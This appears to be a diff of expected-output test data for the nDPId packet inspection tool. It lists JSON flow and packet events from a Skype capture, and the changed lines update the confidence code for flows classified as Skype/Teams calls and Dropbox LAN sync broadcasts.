00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":534,"source":"skype.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969656410,"flow_last_seen":1431969656410,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969656410,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.162","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":534,"source":"skype.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1431969656410,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1431969656410,"pkt":"0NQSxnP1PBXCt3IOCABFAAA+lOIAAEARTinAqAEinTc4ojLdnEQAKlJUm7IC63nFT7uUV5k0L358bPvax6aIijF38KySzDuXwNYHgA=="} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":534,"source":"skype.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969656410,"flow_last_seen":1431969656410,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969656410,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.162","src_port":13021,"dst_port":40004,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":534,"source":"skype.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969656410,"flow_last_seen":1431969656410,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969656410,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.162","src_port":13021,"dst_port":40004,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":535,"source":"skype.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969656410,"flow_last_seen":1431969656410,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969656410,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.33","src_port":13021,"dst_port":40011,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":535,"source":"skype.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1431969656410,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1431969656410,"pkt":"0NQSxnP1PBXCt3IOCABFAAA43x4AAEARCHPAqAEinTg0ITLdnEsAJM3am7QChNdFtOWmIsBdiMlrk7loIt\/AHz17BjRqJg=="} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":535,"source":"skype.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969656410,"flow_last_seen":1431969656410,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969656410,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.33","src_port":13021,"dst_port":40011,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":535,"source":"skype.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969656410,"flow_last_seen":1431969656410,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969656410,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.33","src_port":13021,"dst_port":40011,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":536,"source":"skype.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969656410,"flow_last_seen":1431969656410,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969656410,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.172","src_port":13021,"dst_port":40010,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":536,"source":"skype.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1431969656410,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969656410,"pkt":"0NQSxnP1PBXCt3IOCABFAABAA\/QAAEAR92XAqAEib91NrDLdnEoALEKJm7YClKE3lTfT0DUQisSOS4KG\/La+hJBP5DfxaCwxffHTvFZU"} -00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":536,"source":"skype.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969656410,"flow_last_seen":1431969656410,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969656410,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.172","src_port":13021,"dst_port":40010,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":536,"source":"skype.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969656410,"flow_last_seen":1431969656410,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1431969656410,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.172","src_port":13021,"dst_port":40010,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":537,"source":"skype.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969656410,"flow_last_seen":1431969656410,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969656410,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.160","src_port":13021,"dst_port":40029,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":537,"source":"skype.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1431969656410,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":67,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":67,"pkt_l4_len":33,"thread_ts_msec":1431969656410,"pkt":"0NQSxnP1PBXCt3IOCABFAAA1zB8AAEARzPbAqAEinTeCoDLdnF0AIXcUm7gCbIFVwo6Azkv+1yCNquXcTTuKbOiUHg=="} -00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":537,"source":"skype.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969656410,"flow_last_seen":1431969656410,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969656410,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.160","src_port":13021,"dst_port":40029,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":537,"source":"skype.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969656410,"flow_last_seen":1431969656410,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969656410,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.160","src_port":13021,"dst_port":40029,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":539,"source":"skype.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969656652,"flow_last_seen":1431969656652,"flow_idle_time":200000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":502,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1431969656652,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01121{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":539,"source":"skype.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1431969656652,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":544,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":544,"pkt_l4_len":510,"thread_ts_msec":1431969656652,"pkt":"\/\/\/\/\/\/\/\/PBXCt3IOCABFAAISRnsAAEARcJbAqAEi\/\/\/\/\/0RcRFwB\/vqceyJob3N0X2ludCI6IDE1NzMxOTU0NDUsICJ2ZXJzaW9uIjogWzEsIDhdLCAiZGlzcGxheW5hbWUiOiAiIiwgInBvcnQiOiAxNzUwMCwgIm5hbWVzcGFjZXMiOiBbMTQ4MTkzMzcsIDE3NjA5OTYzLCAyMDY0OTM0OSwgMjg1MjE2MDcsIDU4MzQ0OTk2LCA2MDU5NDk4MywgNjQ0MzYwOTksIDk2ODUzMjI0LCA5OTQ2OTc3MywgMTAxMDQ3OTk2LCAxMDgxNTkxMDIsIDEyNTU0MDU2NiwgMTc2OTY0MzA3LCAyNDM2ODI5ODYsIDI0NzkyNTA4NSwgMjYwNDY1MjYxLCAyNzA0MDQ3NDIsIDI4Mzg2MTQ1NywgNDI0NTQwMTk3LCA0NDgzOTczOTMsIDQ1MTQ3MjY1OCwgNTExNzA2NjQyLCA1NjgzOTU4MzMsIDU5NDI0Njk1NCwgNTk4MDYxMDY2LCA2MTU5ODMzNzksIDcyMDA1ODM2MSwgNzM1MDUxODMwLCA3MzYzNDE1MjgsIDc0MTI1NTYxMywgNzc2MDg3MjQ3LCA3ODA4NzA1ODEsIDc4Mjk4MTk0OSwgNzg1MjY2MTc3LCA4MTg3NTI3MTAsIDg1NTY4MjM5MCwgODg0MTIwMTMyLCA5MDg5MTQ4NjhdfQ=="} -00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":539,"source":"skype.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969656652,"flow_last_seen":1431969656652,"flow_idle_time":200000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":502,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1431969656652,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} +00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":539,"source":"skype.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969656652,"flow_last_seen":1431969656652,"flow_idle_time":200000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":502,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1431969656652,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":540,"source":"skype.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969656652,"flow_last_seen":1431969656652,"flow_idle_time":200000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":502,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1431969656652,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01117{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":540,"source":"skype.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":1431969656652,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":544,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":544,"pkt_l4_len":510,"thread_ts_msec":1431969656652,"pkt":"\/\/\/\/\/\/\/\/PBXCt3IOCABFAAISynkAAEARKfDAqAEiwKgB\/0RcRFwB\/jf1eyJob3N0X2ludCI6IDE1NzMxOTU0NDUsICJ2ZXJzaW9uIjogWzEsIDhdLCAiZGlzcGxheW5hbWUiOiAiIiwgInBvcnQiOiAxNzUwMCwgIm5hbWVzcGFjZXMiOiBbMTQ4MTkzMzcsIDE3NjA5OTYzLCAyMDY0OTM0OSwgMjg1MjE2MDcsIDU4MzQ0OTk2LCA2MDU5NDk4MywgNjQ0MzYwOTksIDk2ODUzMjI0LCA5OTQ2OTc3MywgMTAxMDQ3OTk2LCAxMDgxNTkxMDIsIDEyNTU0MDU2NiwgMTc2OTY0MzA3LCAyNDM2ODI5ODYsIDI0NzkyNTA4NSwgMjYwNDY1MjYxLCAyNzA0MDQ3NDIsIDI4Mzg2MTQ1NywgNDI0NTQwMTk3LCA0NDgzOTczOTMsIDQ1MTQ3MjY1OCwgNTExNzA2NjQyLCA1NjgzOTU4MzMsIDU5NDI0Njk1NCwgNTk4MDYxMDY2LCA2MTU5ODMzNzksIDcyMDA1ODM2MSwgNzM1MDUxODMwLCA3MzYzNDE1MjgsIDc0MTI1NTYxMywgNzc2MDg3MjQ3LCA3ODA4NzA1ODEsIDc4Mjk4MTk0OSwgNzg1MjY2MTc3LCA4MTg3NTI3MTAsIDg1NTY4MjM5MCwgODg0MTIwMTMyLCA5MDg5MTQ4NjhdfQ=="} -00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":540,"source":"skype.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969656652,"flow_last_seen":1431969656652,"flow_idle_time":200000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":502,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1431969656652,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} +00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":540,"source":"skype.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969656652,"flow_last_seen":1431969656652,"flow_idle_time":200000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":502,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1431969656652,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":541,"source":"skype.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969657029,"flow_last_seen":1431969657029,"flow_idle_time":200000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":502,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1431969657029,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01121{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":541,"source":"skype.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1431969657029,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":544,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":544,"pkt_l4_len":510,"thread_ts_msec":1431969657029,"pkt":"\/\/\/\/\/\/\/\/xCwDBkn+CABFAAISvf0AAEAR+NnAqAFc\/\/\/\/\/0RcRFwB\/v9VeyJob3N0X2ludCI6IDMzNzUzNTk1OTMsICJ2ZXJzaW9uIjogWzEsIDhdLCAiZGlzcGxheW5hbWUiOiAiIiwgInBvcnQiOiAxNzUwMCwgIm5hbWVzcGFjZXMiOiBbMTQ4MTkzMzcsIDE3NjA5OTYzLCAyMDY0OTM0OSwgMjg1MjE2MDcsIDU4MzQ0OTk2LCA2MDU5NDk4MywgNjQ0MzYwOTksIDk2ODUzMjI0LCA5OTQ2OTc3MywgMTAxMDQ3OTk2LCAxMDgxNTkxMDIsIDEyNTU0MDU2NiwgMTc2OTY0MzA3LCAyNDM2ODI5ODYsIDI0NzkyNTA4NSwgMjYwNDY1MjYxLCAyNzA0MDQ3NDIsIDI4Mzg2MTQ1NywgNDI0NTQwMTk3LCA0NDgzOTczOTMsIDQ1MTQ3MjY1OCwgNTExNzA2NjQyLCA1NjgzOTU4MzMsIDU5NDI0Njk1NCwgNTk4MDYxMDY2LCA2MTU5ODMzNzksIDcyMDA1ODM2MSwgNzM1MDUxODMwLCA3MzYzNDE1MjgsIDc0MTI1NTYxMywgNzc2MDg3MjQ3LCA3ODA4NzA1ODEsIDc4Mjk4MTk0OSwgNzg1MjY2MTc3LCA4MTg3NTI3MTAsIDg1NTY4MjM5MCwgODg0MTIwMTMyLCA5MDg5MTQ4NjhdfQ=="} -00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":541,"source":"skype.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969657029,"flow_last_seen":1431969657029,"flow_idle_time":200000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":502,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1431969657029,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} +00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":541,"source":"skype.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969657029,"flow_last_seen":1431969657029,"flow_idle_time":200000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":502,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1431969657029,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":542,"source":"skype.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969657029,"flow_last_seen":1431969657029,"flow_idle_time":200000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":502,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1431969657029,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01117{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":542,"source":"skype.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":1431969657029,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":544,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":544,"pkt_l4_len":510,"thread_ts_msec":1431969657029,"pkt":"\/\/\/\/\/\/\/\/xCwDBkn+CABFAAISJhIAAEARzh3AqAFcwKgB\/0RcRFwB\/jyueyJob3N0X2ludCI6IDMzNzUzNTk1OTMsICJ2ZXJzaW9uIjogWzEsIDhdLCAiZGlzcGxheW5hbWUiOiAiIiwgInBvcnQiOiAxNzUwMCwgIm5hbWVzcGFjZXMiOiBbMTQ4MTkzMzcsIDE3NjA5OTYzLCAyMDY0OTM0OSwgMjg1MjE2MDcsIDU4MzQ0OTk2LCA2MDU5NDk4MywgNjQ0MzYwOTksIDk2ODUzMjI0LCA5OTQ2OTc3MywgMTAxMDQ3OTk2LCAxMDgxNTkxMDIsIDEyNTU0MDU2NiwgMTc2OTY0MzA3LCAyNDM2ODI5ODYsIDI0NzkyNTA4NSwgMjYwNDY1MjYxLCAyNzA0MDQ3NDIsIDI4Mzg2MTQ1NywgNDI0NTQwMTk3LCA0NDgzOTczOTMsIDQ1MTQ3MjY1OCwgNTExNzA2NjQyLCA1NjgzOTU4MzMsIDU5NDI0Njk1NCwgNTk4MDYxMDY2LCA2MTU5ODMzNzksIDcyMDA1ODM2MSwgNzM1MDUxODMwLCA3MzYzNDE1MjgsIDc0MTI1NTYxMywgNzc2MDg3MjQ3LCA3ODA4NzA1ODEsIDc4Mjk4MTk0OSwgNzg1MjY2MTc3LCA4MTg3NTI3MTAsIDg1NTY4MjM5MCwgODg0MTIwMTMyLCA5MDg5MTQ4NjhdfQ=="} -00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":542,"source":"skype.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969657029,"flow_last_seen":1431969657029,"flow_idle_time":200000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":502,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1431969657029,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} +00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":542,"source":"skype.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969657029,"flow_last_seen":1431969657029,"flow_idle_time":200000,"flow_min_l4_payload_len":502,"flow_max_l4_payload_len":502,"flow_tot_l4_payload_len":502,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1431969657029,"l3_proto":"ip4","src_ip":"192.168.1.92","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":543,"source":"skype.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969657367,"flow_last_seen":1431969657367,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969657367,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.44","src_port":50032,"dst_port":40032,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":543,"source":"skype.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1431969657367,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969657367,"pkt":"0NQSxnP1PBXCt3IOCABFAABAGANAAEAGj4bAqAEinTg0LMNwnGCx3l8+AAAAALAC\/\/8vJgAAAgQFtAEDAwUBAQgKPiLFlwAAAAAEAgAA"} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":544,"source":"skype.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969657367,"flow_last_seen":1431969657367,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969657367,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.170","src_port":50033,"dst_port":40015,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} @@ -197,19 +197,19 @@ 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":545,"source":"skype.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1431969657367,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969657367,"pkt":"0NQSxnP1PBXCt3IOCABFAABAwhRAAEAGlxXAqAEinTeCjMNynGH\/hzWiAAAAALAC\/\/+8tgAAAgQFtAEDAwUBAQgKPiLFlwAAAAAEAgAA"} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":546,"source":"skype.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969657367,"flow_last_seen":1431969657367,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969657367,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.145","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":546,"source":"skype.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":1,"flow_last_seen":1431969657367,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":1431969657367,"pkt":"0NQSxnP1PBXCt3IOCABFAAA\/NlsAAEARxRrAqAEib91NkTLdnFsAK6mBm7oCyq7Iy7cmxwvThWDRoZOMl0+28C1BuPbRnMjSw2j4JUc="} 